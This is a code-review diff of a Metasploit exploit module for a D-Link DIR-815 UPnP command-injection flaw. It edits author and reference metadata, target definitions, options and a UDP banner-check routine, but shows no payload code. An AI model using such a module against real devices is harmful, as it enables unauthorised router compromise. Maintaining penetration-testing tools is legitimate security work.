@@ -22,13 +22,13 @@ def initialize(info = {})
2222 'Author' =>
2323 [
2424 'Zachary Cutlip' , # Vulnerability discovery and initial exploit
25- 'Michael Messner <devnull@ s3cur1ty.de>' # Metasploit module and verification on other routers
25+ 'Michael Messner <devnull[at] s3cur1ty.de>' # Metasploit module and verification on other routers
2626 ] ,
2727 'License' => MSF_LICENSE ,
2828 'References' =>
2929 [
30- [ 'URL' , 'https://github.com/zcutlip/exploit-poc/tree/master/dlink/dir-815-a1/upnp-command-injection' ] , # original exploit
31- [ 'URL' , 'http://shadow-file.blogspot.com/2013/02/dlink-dir-815-upnp-command-injection.html' ] # original exploit
30+ [ 'URL' , 'https://github.com/zcutlip/exploit-poc/tree/master/dlink/dir-815-a1/upnp-command-injection' ] , # original exploit
31+ [ 'URL' , 'http://shadow-file.blogspot.com/2013/02/dlink-dir-815-upnp-command-injection.html' ] # original exploit
3232 ] ,
3333 'DisclosureDate' => 'Feb 01 2013' ,
3434 'Privileged' => true ,
@@ -40,21 +40,23 @@ def initialize(info = {})
4040 'Arch' => ARCH_MIPSLE
4141 }
4242 ] ,
43- [ 'MIPS Big Endian' , # unknown if there are big endian devices out there
43+ [ 'MIPS Big Endian' , # unknown if there are big endian devices out there
4444 {
4545 'Platform' => 'linux' ,
4646 'Arch' => ARCH_MIPS
4747 }
48- ] ,
48+ ]
4949 ] ,
5050 'DefaultTarget' => 0
5151 ) )
52+
5253 register_options (
5354 [
5455 Opt ::RHOST ( ) ,
55- Opt ::RPORT ( 1900 ) ,
56+ Opt ::RPORT ( 1900 )
5657 ] , self . class )
5758
59+ deregister_options ( 'CMDSTAGER::DECODER' , 'CMDSTAGER::FLAVOR' )
5860 end
5961
6062 def check
@@ -72,8 +74,8 @@ def check
7274 res = nil
7375 1 . upto ( 5 ) do
7476 res , _ , _ = udp_sock . recvfrom ( 65535 , 1.0 )
75- break if res and res =~ /SERVER:\ Linux,\ UPnP\/ 1.0,\ DIR-...\ Ver/mi
76- udp_sock . sendto ( msearch , rhost , rport , 0 )
77+ break if res and res =~ /SERVER:\ Linux,\ UPnP\/ 1\ .\ DIR-...\ Ver/mi
78+ udp_sock . sendto ( pkt , rhost , rport , 0 )
7779 end
7880
7981 # UPnP response:
0 commit comments